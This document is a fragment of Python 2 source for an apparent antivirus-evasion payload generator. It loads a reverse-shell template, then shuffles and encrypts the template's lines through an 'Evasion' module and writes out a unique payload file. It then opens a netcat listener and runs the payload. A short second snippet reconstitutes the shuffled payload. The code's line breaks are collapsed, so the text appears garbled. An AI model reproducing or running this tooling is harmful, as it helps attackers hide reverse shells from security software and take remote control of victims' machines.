def main(): decryptKey = generateKey() decryptIV = generateIV() code = read_template() template_reverse_shell payloadNoEncrypt = template_reverse_shell.splitlines() shuffledPayload = commandSegmentationTech(payloadNoEncrypt) # writableLines = convertIntoLines(shuffledPayload) l_encrypted = cryptor(shuffledPayload, decryptKey, decryptIV) outfile = writeUniquePayload(code, l_encrypted, decryptKey, decryptIV) print red("DEBUG: Shuffled payload\r\n{}".format(str(shuffledPayload))) out = b64encode(l_encrypted) print yellow("DEBUG: Encrypted payload\r\n{}".format(str(out))) print green("DEBUG: Payload generated at\r\n{}".format(str(outfile))) rp = open(outfile, 'rb+') uniquePayload = rp.read() print red("DEBUG: Contents of {}\r\n".format(str(outfile))) print yellow(uniquePayload) print cyan("Opening netcat session") os.system("""gnome-terminal -e 'bash -c "nc -nvlp {}"'""".format( str(LPORT))) print green("You may run the payload with\r\npython {}".format( str(outfile))) time.sleep(2) print green("Executing payload") os.system("python {}".format(str(outfile))) return
import Evasion from Evasion import readPayloadTemplate,findIndexValue, commandSegmentationTech,reconstituteLine,reconstitutePayload,template_reverse_shell payloadNoEncrypt = template_reverse_shell.splitlines() shuffledPayload = commandSegmentationTech(payloadNoEncrypt) reconstitutePayload(shuffledPayload)